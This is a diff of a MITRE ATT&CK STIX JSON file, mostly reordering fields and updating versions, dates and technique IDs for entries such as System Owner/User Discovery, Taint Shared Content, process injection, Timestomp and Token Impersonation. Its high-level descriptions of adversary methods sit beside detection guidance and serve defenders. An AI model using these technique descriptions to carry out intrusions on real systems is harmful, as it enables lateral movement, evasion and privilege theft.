- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.2"
},
{
"object_marking_refs": [
@@ -26434,6 +27337,20 @@
],
"modified": "2020-03-15T14:15:32.910Z",
"created": "2017-05-31T21:30:45.139Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_version": "2.1",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -26441,26 +27358,22 @@
"AWS",
"GCP",
"Azure"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_is_subtechnique": false
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:35.733Z",
+ "modified": "2020-03-15T01:03:47.866Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "System Owner/User Discovery",
+ "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nUtilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -26473,19 +27386,9 @@
"url": "https://capec.mitre.org/data/definitions/577.html"
}
],
- "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nUtilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.",
- "name": "System Owner/User Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-15T01:03:47.866Z",
- "created": "2017-05-31T21:30:35.733Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -26533,21 +27436,21 @@
],
"modified": "2020-03-15T01:05:08.805Z",
"created": "2017-05-31T21:30:21.315Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -26571,27 +27474,27 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T19:01:50.128Z",
+ "modified": "2020-06-08T23:28:29.250Z",
"created": "2020-03-10T18:23:06.482Z",
- "x_mitre_platforms": [
- "Windows",
- "macOS"
- ],
- "x_mitre_data_sources": [
- "Windows Registry",
- "Process command-line parameters",
- "Process monitoring",
- "File monitoring"
- ],
- "x_mitre_detection": "Monitor for command line invocations of tools capable of modifying services that doesn\u2019t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM",
"root"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor for command line invocations of tools capable of modifying services that doesn\u2019t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.",
+ "x_mitre_data_sources": [
+ "Windows Registry",
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -26632,15 +27535,11 @@
],
"modified": "2020-03-27T21:18:48.149Z",
"created": "2019-10-04T20:42:28.541Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Windows event logs",
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.",
+ "x_mitre_version": "1.0",
+ "x_mitre_impact_type": [
+ "Availability"
],
"x_mitre_permissions_required": [
"User",
@@ -26648,12 +27547,16 @@
"root",
"SYSTEM"
],
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_data_sources": [
+ "Windows event logs",
+ "Process command-line parameters",
+ "Process monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.",
- "x_mitre_is_subtechnique": false
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
@@ -26699,20 +27602,20 @@
],
"modified": "2020-03-15T01:07:42.700Z",
"created": "2017-05-31T21:31:37.450Z",
- "x_mitre_version": "1.1",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
"API monitoring"
],
- "x_mitre_detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e",
@@ -26827,30 +27730,30 @@
],
"modified": "2020-03-25T22:13:59.473Z",
"created": "2020-01-17T16:15:19.870Z",
- "x_mitre_contributors": [
- "Tony Lambert, Red Canary"
+ "x_mitre_platforms": [
+ "Linux"
],
+ "x_mitre_detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -\u2013type=service \u2013all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.",
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User",
- "root"
- ],
- "x_mitre_detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -\u2013type=service \u2013all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.",
- "x_mitre_platforms": [
- "Linux"
+ "x_mitre_contributors": [
+ "Tony Lambert, Red Canary"
]
},
{
"id": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Taint Shared Content",
- "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
+ "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -26878,28 +27781,28 @@
"phase_name": "lateral-movement"
}
],
- "modified": "2020-02-12T20:27:07.764Z",
+ "modified": "2020-03-31T22:14:56.107Z",
"created": "2017-05-31T21:31:01.759Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring"
- ],
- "x_mitre_contributors": [
- "Michal Dida, ESET",
- "David Routin"
- ],
- "x_mitre_detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_system_requirements": [
+ "Access to shared folders and content with write permissions"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_system_requirements": [
- "Access to shared folders and content with write permissions"
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.",
+ "x_mitre_contributors": [
+ "Michal Dida, ESET",
+ "David Routin"
+ ],
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
@@ -26958,11 +27861,18 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T23:32:53.432Z",
+ "modified": "2020-04-29T14:37:59.462Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
- "x_mitre_contributors": [
- "Patrick Campbell, @pjcampbe11"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.",
+ "x_mitre_defense_bypassed": [
+ "Static File Analysis"
],
"x_mitre_data_sources": [
"Anti-virus",
@@ -26970,17 +27880,11 @@
"Network intrusion detection system",
"Web logs"
],
- "x_mitre_defense_bypassed": [
- "Static File Analysis"
+ "x_mitre_contributors": [
+ "Brian Wiltse @evalstrings",
+ "Patrick Campbell, @pjcampbe11"
],
- "x_mitre_detection": "Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -27013,24 +27917,24 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-02-21T22:40:58.149Z",
+ "modified": "2020-06-20T22:21:29.233Z",
"created": "2020-01-14T01:28:32.166Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Anti-virus"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -27069,21 +27973,21 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-02-21T22:41:25.118Z",
+ "modified": "2020-06-20T22:23:30.093Z",
"created": "2020-01-14T01:30:41.092Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -27106,30 +28010,34 @@
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
}
],
- "modified": "2020-03-27T14:14:03.875Z",
+ "modified": "2020-07-01T16:32:02.532Z",
"created": "2020-03-06T21:11:11.225Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Deloitte Threat Library Team"
- ],
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_defense_bypassed": [
"Host forensic analysis",
"Signature-based detection",
"Static File Analysis",
"Anti-virus"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_contributors": [
+ "Deloitte Threat Library Team"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -27225,12 +28133,13 @@
],
"modified": "2020-03-25T15:24:26.476Z",
"created": "2020-01-24T15:51:52.317Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Scott Lundgren, @5twenty9, Carbon Black"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "Administrator"
],
+ "x_mitre_detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)",
"x_mitre_data_sources": [
"API monitoring",
"Binary file metadata",
@@ -27239,13 +28148,12 @@
"Loaded DLLs",
"Process monitoring"
],
- "x_mitre_detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)",
- "x_mitre_permissions_required": [
- "SYSTEM",
- "Administrator"
+ "x_mitre_contributors": [
+ "Scott Lundgren, @5twenty9, Carbon Black"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -27268,11 +28176,27 @@
"created": "2017-05-31T21:31:12.675Z"
},
{
+ "created": "2020-01-31T12:42:44.103Z",
+ "modified": "2020-03-29T21:39:46.724Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+ "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
+ "name": "Timestomp",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.006",
- "url": "https://attack.mitre.org/techniques/T1551/006"
+ "external_id": "T1070.006",
+ "url": "https://attack.mitre.org/techniques/T1070/006"
},
{
"url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html",
@@ -27280,22 +28204,6 @@
"source_name": "WindowsIR Anti-Forensic Techniques"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Timestomp",
- "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
- "id": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T21:39:46.724Z",
- "created": "2020-01-31T12:42:44.103Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -27322,6 +28230,26 @@
]
},
{
+ "created": "2020-02-18T16:39:06.289Z",
+ "modified": "2020-03-26T21:29:18.608Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
+ "name": "Token Impersonation/Theft",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -27334,26 +28262,6 @@
"source_name": "Microsoft Command-line Logging"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Token Impersonation/Theft",
